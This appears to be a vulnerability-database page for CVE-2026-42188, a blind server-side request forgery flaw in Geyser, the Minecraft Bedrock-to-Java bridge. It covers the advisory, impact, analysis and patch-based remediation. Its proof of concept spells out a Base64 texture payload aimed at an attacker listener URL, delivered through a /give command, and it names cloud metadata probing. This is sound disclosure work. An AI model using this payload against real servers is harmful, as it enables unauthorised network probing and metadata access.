Geyser CVE-2026-42188
LOWSeverity by source
AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.
Details
Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.
When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.
PoC
- Setup Environment:
- Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
- Ensure you have a Bedrock client connected.
- Prepare Listener:
- Go to webhook.site and obtain a unique URL (e.g.,
https://webhook.site/YOUR-UUID).
- Construct Payload:
- Create a JSON payload pointing to your listener URL:
{"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}
- Encode this JSON string to Base64.
*(You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)*
- Execute Command:
- Run the following command in the Bedrock Edition client:
/give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]
- Verify:
- Check the webhook.site dashboard.
- You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.
Impact
This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.
Affected Parties
- Minecraft servers running Geyser
- Server operators exposing internal or cloud metadata endpoints
Potential Impacts
- Internal network probing (e.g., intranet services, admin panels)
- Cloud metadata access attempts (e.g., 169.254.169.254)
- IP address disclosure of the Minecraft server
- Abuse of the server as an HTTP request proxy
Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:
- Network mapping
- Firewall bypass attempts
- Cloud environment fingerprinting
AnalysisAI
Server-side request forgery (SSRF) in Geyser through version 2.9.2 allows authenticated attackers with operator privileges to cause the Minecraft server to issue arbitrary HTTP GET requests to internal or attacker-controlled endpoints via crafted Base64-encoded player head texture URLs in the /give command. The vulnerability enables blind SSRF attacks for network reconnaissance, cloud metadata probing, and server IP disclosure without requiring unauthenticated access. Publicly available exploit code exists demonstrating proof-of-concept via webhook.site.
Technical ContextAI
Geyser is a middleware that bridges Bedrock Edition clients to Java Edition Minecraft servers. The vulnerability exists in the player head texture processing logic, specifically within the handling of the minecraft:profile NBT structure used for custom player heads. When a player head is created with a textures property containing a Base64-encoded JSON payload, Geyser decodes and processes the textures.SKIN.url field without sufficient URL validation before issuing HTTP GET requests to fetch the texture resource. The lack of validation against private IP ranges, reserved addresses (169.254.169.254 for AWS metadata), and localhost variations enables SSRF. The root cause is insufficient input validation on user-supplied URLs prior to outbound HTTP request execution (CWE-918: Server-Side Request Forgery).
RemediationAI
Vendor-released patch available: upgrade Geyser to version 2.9.3 or later. Apply the patch by replacing the geyser-core JAR file and restarting the Minecraft server. For operators unable to patch immediately, implement input validation workarounds by using permission plugins to restrict the /give command to trusted administrators only, and disable Bedrock client access if not required for operational needs. Monitor outbound HTTP requests from the Minecraft server process using firewall rules or network monitoring tools; block requests to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local addresses (169.254.0.0/16), and localhost (127.0.0.1). Consider restricting Bedrock client connectivity to trusted network segments or disabling NBT texture profile features if supported in future Geyser releases. See GitHub advisory at https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r for detailed patch release notes.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-xcfg-fcr5-gw9r